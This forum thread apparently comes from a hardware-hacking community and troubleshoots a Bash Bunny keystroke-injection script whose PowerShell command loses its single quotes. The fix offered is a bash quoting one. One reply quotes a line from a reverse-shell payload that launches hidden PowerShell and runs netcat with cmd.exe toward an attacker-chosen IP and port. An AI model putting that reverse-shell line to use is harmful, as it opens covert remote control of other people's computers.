Jump to content

Simple payload gets stuck halfway through


HamHack

Recommended Posts

Hey.

For some reason my Bash Bunny script gets stuck right after opening up the powershell, but I can't seem to figure out why it's happening. I tried replacing the line right under the 500 delay with a simple string, which made it work, but it won't work as is.

This is my script:

LED SETUP

ATTACKMODE HID STORAGE

LED ATTACK

Q SET_LANGUAGE gb

Q GUI r
Q DELAY 150
Q STRING powershell
Q ENTER

Q DELAY 500

Q STRING cd (gwmi -class win32_volume -filter "label='BashBunny'").Name.Substring(0,2)
Q ENTER
Q STRING cd payloads/switch1
Q ENTER

LED FINISH

Link to comment
Share on other sites

@GermanNoob That was definitely an improvement, as it's now being written out, but the string is missing the single quotes around the word BashBunny.

It's being written like this: cd (gwmi -class win32_volume -filter "label=BashBunny").Name.Substring(0,2)

But I need it to write it like this: cd (gwmi -class win32_volume -filter "label='BashBunny'").Name.Substring(0,2)

How do I get it to include the single quotes as well?

Link to comment
Share on other sites

@GermanNoob That was definitely an improvement, as it's now being written out, but the string is missing the single quotes around the word BashBunny.

It's being written like this: 

cd (gwmi -class win32_volume -filter "label=BashBunny").Name.Substring(0,2)

But I need it to write it like this: 

cd (gwmi -class win32_volume -filter "label='BashBunny'").Name.Substring(0,2)

How do I get it to include the single quotes as well?

Link to comment
Share on other sites

I'm not a powershell guy to be honest... 

But why aren't you using the similar commands from other payloads, e.g. RAZ_ReverseShell

QUACK STRING powershell -WindowStyle Hidden \".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\nc.exe') -nv ${my_ip} ${my_port} -e cmd.exe\"

 

Link to comment
Share on other sites

Issue is with how bash on the Bunny is interpreting your string.  An example is echo that line in a Linux bash terminal and you will see the issue.  Like replace "quack string" with echo..if you have access to a bash terminal.  If not then here is a trick to do.

After your QUACK STRING, encapsulate the whole command in double quotes.  Once you do that, you will only need to escape "$" and other inner double quotes.  Single quotes can be by themselves without needing to escape.  Example.

Q STRING "cd (gwmi -class win32_volume -filter \"label='BashBunny'\").Name.Substring(0,2)"

That should fix your issue without changing your method.

  • Like 2
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...